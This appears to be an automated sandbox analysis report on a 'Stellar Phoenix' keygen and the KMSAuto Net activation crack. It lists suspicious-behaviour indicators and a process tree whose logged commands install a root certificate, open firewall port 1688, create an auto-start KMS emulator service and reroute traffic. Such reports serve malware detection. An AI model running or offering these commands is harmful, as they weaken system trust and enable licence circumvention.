pid process 620 620 620 620 620 620 620 620 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
AUDIODG.EXENETSTAT.EXEKMSAuto Net.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeNETSTAT.EXEtaskkill.exetaskkill.exemsiexec.exemsiexec.exedescription pid process Token: 33 1824 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1824 AUDIODG.EXE Token: SeDebugPrivilege 4076 NETSTAT.EXE Token: SeDebugPrivilege 1052 KMSAuto Net.exe Token: SeDebugPrivilege 1020 taskkill.exe Token: SeDebugPrivilege 4040 taskkill.exe Token: SeDebugPrivilege 1188 taskkill.exe Token: SeDebugPrivilege 3796 taskkill.exe Token: SeDebugPrivilege 1400 taskkill.exe Token: SeDebugPrivilege 3972 taskkill.exe Token: SeDebugPrivilege 3976 taskkill.exe Token: SeDebugPrivilege 1256 taskkill.exe Token: SeDebugPrivilege 2288 taskkill.exe Token: SeDebugPrivilege 3684 taskkill.exe Token: SeDebugPrivilege 1136 taskkill.exe Token: SeDebugPrivilege 2440 NETSTAT.EXE Token: SeDebugPrivilege 1500 taskkill.exe Token: SeDebugPrivilege 3924 taskkill.exe Token: SeShutdownPrivilege 2668 msiexec.exe Token: SeIncreaseQuotaPrivilege 2668 msiexec.exe Token: SeSecurityPrivilege 4104 msiexec.exe Token: SeCreateTokenPrivilege 2668 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2668 msiexec.exe Token: SeLockMemoryPrivilege 2668 msiexec.exe Token: SeIncreaseQuotaPrivilege 2668 msiexec.exe Token: SeMachineAccountPrivilege 2668 msiexec.exe Token: SeTcbPrivilege 2668 msiexec.exe Token: SeSecurityPrivilege 2668 msiexec.exe Token: SeTakeOwnershipPrivilege 2668 msiexec.exe Token: SeLoadDriverPrivilege 2668 msiexec.exe Token: SeSystemProfilePrivilege 2668 msiexec.exe Token: SeSystemtimePrivilege 2668 msiexec.exe Token: SeProfSingleProcessPrivilege 2668 msiexec.exe Token: SeIncBasePriorityPrivilege 2668 msiexec.exe Token: SeCreatePagefilePrivilege 2668 msiexec.exe Token: SeCreatePermanentPrivilege 2668 msiexec.exe Token: SeBackupPrivilege 2668 msiexec.exe Token: SeRestorePrivilege 2668 msiexec.exe Token: SeShutdownPrivilege 2668 msiexec.exe Token: SeDebugPrivilege 2668 msiexec.exe Token: SeAuditPrivilege 2668 msiexec.exe Token: SeSystemEnvironmentPrivilege 2668 msiexec.exe Token: SeChangeNotifyPrivilege 2668 msiexec.exe Token: SeRemoteShutdownPrivilege 2668 msiexec.exe Token: SeUndockPrivilege 2668 msiexec.exe Token: SeSyncAgentPrivilege 2668 msiexec.exe Token: SeEnableDelegationPrivilege 2668 msiexec.exe Token: SeManageVolumePrivilege 2668 msiexec.exe Token: SeImpersonatePrivilege 2668 msiexec.exe Token: SeCreateGlobalPrivilege 2668 msiexec.exe Token: SeCreateTokenPrivilege 2668 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2668 msiexec.exe Token: SeLockMemoryPrivilege 2668 msiexec.exe Token: SeIncreaseQuotaPrivilege 2668 msiexec.exe Token: SeMachineAccountPrivilege 2668 msiexec.exe Token: SeTcbPrivilege 2668 msiexec.exe Token: SeSecurityPrivilege 2668 msiexec.exe Token: SeTakeOwnershipPrivilege 2668 msiexec.exe Token: SeLoadDriverPrivilege 2668 msiexec.exe Token: SeSystemProfilePrivilege 2668 msiexec.exe Token: SeSystemtimePrivilege 2668 msiexec.exe Token: SeProfSingleProcessPrivilege 2668 msiexec.exe Token: SeIncBasePriorityPrivilege 2668 msiexec.exe Token: SeCreatePagefilePrivilege 2668 msiexec.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
msiexec.exepid process 2668 msiexec.exe 2668 msiexec.exe -
Suspicious use of SetWindowsHookEx 25 IoCs
Processes:
Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exewzt.datcertmgr.execertmgr.exebin.datAESDecoder.exebin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datwzt.datcertmgr.execertmgr.exebin.datAESDecoder.exebin_x64.datSppPatcher_x64.datpid process 3912 Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe 3912 Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe 2600 wzt.dat 2588 certmgr.exe 984 certmgr.exe 2364 bin.dat 2608 AESDecoder.exe 3980 bin_x64.dat 3916 bin_x64.dat 2448 bin_x64.dat 1324 bin_x64.dat 1596 bin_x64.dat 428 bin_x64.dat 516 bin_x64.dat 812 bin_x64.dat 3168 bin_x64.dat 2912 bin_x64.dat 2328 bin_x64.dat 2100 wzt.dat 804 certmgr.exe 1628 certmgr.exe 3808 bin.dat 896 AESDecoder.exe 936 bin_x64.dat 1680 SppPatcher_x64.dat -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
KMSAuto Net.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1052 wrote to memory of 3812 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 3812 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 3812 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 1356 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 1356 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 3724 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 3724 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 2356 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 2356 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 480 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 480 1052 KMSAuto Net.exe cmd.exe PID 480 wrote to memory of 2600 480 cmd.exe wzt.dat PID 480 wrote to memory of 2600 480 cmd.exe wzt.dat PID 480 wrote to memory of 2600 480 cmd.exe wzt.dat PID 1052 wrote to memory of 2168 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 2168 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 932 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 932 1052 KMSAuto Net.exe cmd.exe PID 932 wrote to memory of 2588 932 cmd.exe certmgr.exe PID 932 wrote to memory of 2588 932 cmd.exe certmgr.exe PID 932 wrote to memory of 2588 932 cmd.exe certmgr.exe PID 1052 wrote to memory of 1576 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 1576 1052 KMSAuto Net.exe cmd.exe PID 1576 wrote to memory of 984 1576 cmd.exe certmgr.exe PID 1576 wrote to memory of 984 1576 cmd.exe certmgr.exe PID 1576 wrote to memory of 984 1576 cmd.exe certmgr.exe PID 1052 wrote to memory of 1324 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 1324 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 3620 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 3620 1052 KMSAuto Net.exe cmd.exe PID 3620 wrote to memory of 2364 3620 cmd.exe bin.dat PID 3620 wrote to memory of 2364 3620 cmd.exe bin.dat PID 3620 wrote to memory of 2364 3620 cmd.exe bin.dat PID 1052 wrote to memory of 3900 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 3900 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 2092 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 2092 1052 KMSAuto Net.exe cmd.exe PID 2092 wrote to memory of 2608 2092 cmd.exe AESDecoder.exe PID 2092 wrote to memory of 2608 2092 cmd.exe AESDecoder.exe PID 2092 wrote to memory of 2608 2092 cmd.exe AESDecoder.exe PID 1052 wrote to memory of 3140 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 3140 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 3924 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 3924 1052 KMSAuto Net.exe cmd.exe PID 3924 wrote to memory of 3980 3924 cmd.exe bin_x64.dat PID 3924 wrote to memory of 3980 3924 cmd.exe bin_x64.dat PID 3924 wrote to memory of 3980 3924 cmd.exe bin_x64.dat PID 1052 wrote to memory of 1952 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 1952 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 1568 1052 KMSAuto Net.exe cmd.exe PID 1052 wrote to memory of 1568 1052 KMSAuto Net.exe cmd.exe PID 1568 wrote to memory of 1336 1568 cmd.exe cmd.exe PID 1568 wrote to memory of 1336 1568 cmd.exe cmd.exe PID 1336 wrote to memory of 4076 1336 cmd.exe NETSTAT.EXE PID 1336 wrote to memory of 4076 1336 cmd.exe NETSTAT.EXE PID 1336 wrote to memory of 2912 1336 cmd.exe find.exe PID 1336 wrote to memory of 2912 1336 cmd.exe find.exe PID 1052 wrote to memory of 3168 1052 KMSAuto Net.exe Netsh.exe PID 1052 wrote to memory of 3168 1052 KMSAuto Net.exe Netsh.exe PID 1052 wrote to memory of 772 1052 KMSAuto Net.exe Netsh.exe PID 1052 wrote to memory of 772 1052 KMSAuto Net.exe Netsh.exe PID 1052 wrote to memory of 2092 1052 KMSAuto Net.exe sc.exe PID 1052 wrote to memory of 2092 1052 KMSAuto Net.exe sc.exe PID 1052 wrote to memory of 2092 1052 KMSAuto Net.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe"C:\Users\Admin\AppData\Local\Temp\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe"1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\KMSAuto Net.exe"C:\Users\Admin\Desktop\KMSAuto Net.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c md "C:\Users\Admin\AppData\Local\MSfree Inc"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /c echo test>>"C:\Users\Admin\Desktop\test.test"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "test.test"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c md "C:\ProgramData\KMSAuto"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c wzt.dat -y -pkmsauto2⤵
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\KMSAuto\wzt.datwzt.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "wzt.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine ROOT2⤵
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\KMSAuto\wzt\certmgr.execertmgr.exe -add wzteam.cer -n wzteam -s -r localMachine ROOT3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine TRUSTEDPUBLISHER2⤵
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\KMSAuto\wzt\certmgr.execertmgr.exe -add wzteam.cer -n wzteam -s -r localMachine TRUSTEDPUBLISHER3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c rd "C:\ProgramData\KMSAuto\wzt" /S /Q2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin.dat -y -pkmsauto2⤵
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\KMSAuto\bin.datbin.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c AESDecoder.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\KMSAuto\bin\AESDecoder.exeAESDecoder.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "AESDecoder.exe"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto2⤵
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\KMSAuto\bin_x64.datbin_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c for /f "tokens=5 delims=, " %i in ('netstat -ano ^| find ":1688 "') do taskkill /pid %i /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netstat -ano | find ":1688 "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\NETSTAT.EXEnetstat -ano4⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind ":1688 "4⤵
-
C:\Windows\System32\Netsh.exeC:\Windows\Sysnative\Netsh Advfirewall Firewall delete rule name="0pen Port KMS" protocol=TCP2⤵
-
C:\Windows\System32\Netsh.exeC:\Windows\Sysnative\Netsh Advfirewall Firewall add rule name="0pen Port KMS" dir=in action=allow protocol=TCP localport=16882⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" create KMSEmulator binpath= temp.exe type= own start= auto2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" start KMSEmulator2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\bin_x64.datbin_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 12⤵
-
C:\Windows\system32\ROUTE.EXEroute -p add 100.100.0.10 0.0.0.0 IF 13⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.102⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.02⤵
-
C:\Windows\system32\ROUTE.EXEroute delete 100.100.0.10 0.0.0.03⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /t /f /IM FakeClient.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /IM FakeClient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop WinDivert1.12⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete WinDivert1.12⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\bin_x64.datbin_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 12⤵
-
C:\Windows\system32\ROUTE.EXEroute -p add 100.100.0.10 0.0.0.0 IF 13⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.102⤵
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exeFakeClient.exe 100.100.0.103⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.02⤵
-
C:\Windows\system32\ROUTE.EXEroute delete 100.100.0.10 0.0.0.03⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /t /f /IM FakeClient.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /IM FakeClient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop WinDivert1.12⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete WinDivert1.12⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\bin_x64.datbin_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 12⤵
-
C:\Windows\system32\ROUTE.EXEroute -p add 100.100.0.10 0.0.0.0 IF 13⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.102⤵
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exeFakeClient.exe 100.100.0.103⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.02⤵
-
C:\Windows\system32\ROUTE.EXEroute delete 100.100.0.10 0.0.0.03⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /t /f /IM FakeClient.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /IM FakeClient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop WinDivert1.12⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete WinDivert1.12⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\bin_x64.datbin_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 12⤵
-
C:\Windows\system32\ROUTE.EXEroute -p add 100.100.0.10 0.0.0.0 IF 13⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.102⤵
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exeFakeClient.exe 100.100.0.103⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.02⤵
-
C:\Windows\system32\ROUTE.EXEroute delete 100.100.0.10 0.0.0.03⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /t /f /IM FakeClient.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /IM FakeClient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop WinDivert1.12⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete WinDivert1.12⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\bin_x64.datbin_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 12⤵
-
C:\Windows\system32\ROUTE.EXEroute -p add 100.100.0.10 0.0.0.0 IF 13⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.102⤵
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exeFakeClient.exe 100.100.0.103⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.02⤵
-
C:\Windows\system32\ROUTE.EXEroute delete 100.100.0.10 0.0.0.03⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /t /f /IM FakeClient.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /IM FakeClient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop WinDivert1.12⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete WinDivert1.12⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\bin_x64.datbin_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 12⤵
-
C:\Windows\system32\ROUTE.EXEroute -p add 100.100.0.10 0.0.0.0 IF 13⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.102⤵
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exeFakeClient.exe 100.100.0.103⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.02⤵
-
C:\Windows\system32\ROUTE.EXEroute delete 100.100.0.10 0.0.0.03⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /t /f /IM FakeClient.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /IM FakeClient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop WinDivert1.12⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete WinDivert1.12⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\bin_x64.datbin_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 12⤵
-
C:\Windows\system32\ROUTE.EXEroute -p add 100.100.0.10 0.0.0.0 IF 13⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.102⤵
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exeFakeClient.exe 100.100.0.103⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.02⤵
-
C:\Windows\system32\ROUTE.EXEroute delete 100.100.0.10 0.0.0.03⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /t /f /IM FakeClient.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /IM FakeClient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop WinDivert1.12⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete WinDivert1.12⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\bin_x64.datbin_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 12⤵
-
C:\Windows\system32\ROUTE.EXEroute -p add 100.100.0.10 0.0.0.0 IF 13⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.102⤵
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exeFakeClient.exe 100.100.0.103⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.02⤵
-
C:\Windows\system32\ROUTE.EXEroute delete 100.100.0.10 0.0.0.03⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /t /f /IM FakeClient.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /IM FakeClient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop WinDivert1.12⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete WinDivert1.12⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\bin_x64.datbin_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 12⤵
-
C:\Windows\system32\ROUTE.EXEroute -p add 100.100.0.10 0.0.0.0 IF 13⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.102⤵
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exeFakeClient.exe 100.100.0.103⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.02⤵
-
C:\Windows\system32\ROUTE.EXEroute delete 100.100.0.10 0.0.0.03⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /t /f /IM FakeClient.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /IM FakeClient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop WinDivert1.12⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete WinDivert1.12⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\bin_x64.datbin_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 12⤵
-
C:\Windows\system32\ROUTE.EXEroute -p add 100.100.0.10 0.0.0.0 IF 13⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.102⤵
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exeFakeClient.exe 100.100.0.103⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.02⤵
-
C:\Windows\system32\ROUTE.EXEroute delete 100.100.0.10 0.0.0.03⤵
-
